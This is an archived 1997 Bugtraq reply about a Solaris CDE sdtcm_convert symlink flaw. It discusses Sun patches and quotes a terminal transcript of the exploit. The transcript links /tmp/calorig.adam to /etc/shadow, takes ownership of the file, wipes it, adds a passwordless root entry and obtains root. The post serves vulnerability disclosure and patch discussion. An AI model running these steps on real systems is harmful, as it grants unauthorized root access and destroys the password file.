Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
From: shuque () SAS UPENN EDU (Shumon Huque)
Date: Sun, 23 Feb 1997 15:40:43 -0500


I don't know what exactly 103670-02 fixed but this exploit didn't work
on my machine - 2.5.1, CDE 1.0.2 with 103670-02 applied. The symlink
/tmp/calorig.user was removed and replaced by a plain file owned
by user.


Is this the bug fixed in the Sun patches:
103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
or is it a new one?

That's hard to know, since this patch is not publicly available off
SunSolve (not right now, anyway).

There's at least one other hole in sdtcm_convert which this patch may or not
fix.

CDE is generally a can of worms.


$Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $

Script started on Thu Jul 11 22:15:03 1996
22:15  [wumpus:~] % whoami
adam
22:15  [wumpus:~] % ls -l /etc/shadow
-r--------   1 root     sys          291 Jul 11 22:14 /etc/shadow
22:15  [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
22:15  [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
Loading the calendar ...

WARNING!! Data will be lost when converting version 4 data format
back to version 3 data format.

Do you want to continue? (Y/N) [Y] y

Doing conversion ...
Writing out new file ...
Conversion done successfully.
Total number of appointments                    = 0
Number of one-time appointments converted       = 0
Number of repeating appointments converted      = 0
Number of one-time appointments pruned          = 0
Number of repeating appointments pruned         = 0
The original file is saved in /tmp/calorig.adam
22:15  [wumpus:~] % ls -l /etc/shadow
-r--rw----   1 adam     daemon      3114 Jul 11 22:15 /etc/shadow
22:15  [wumpus:~] % chmod 644 /etc/shadow
22:15  [wumpus:~] % cp /dev/null /etc/shadow
cp: overwrite /etc/shadow (y/n)? y
22:15  [wumpus:~] % ls -l /etc/shadow
-rw-r--r--   1 adam     daemon         0 Jul 11 22:15 /etc/shadow
22:15  [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
22:16  [wumpus:~] % su
# id
uid=0(root) gid=1(other)
# exit

script done on Thu Jul 11 22:16:21 1996



                                                adam?




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault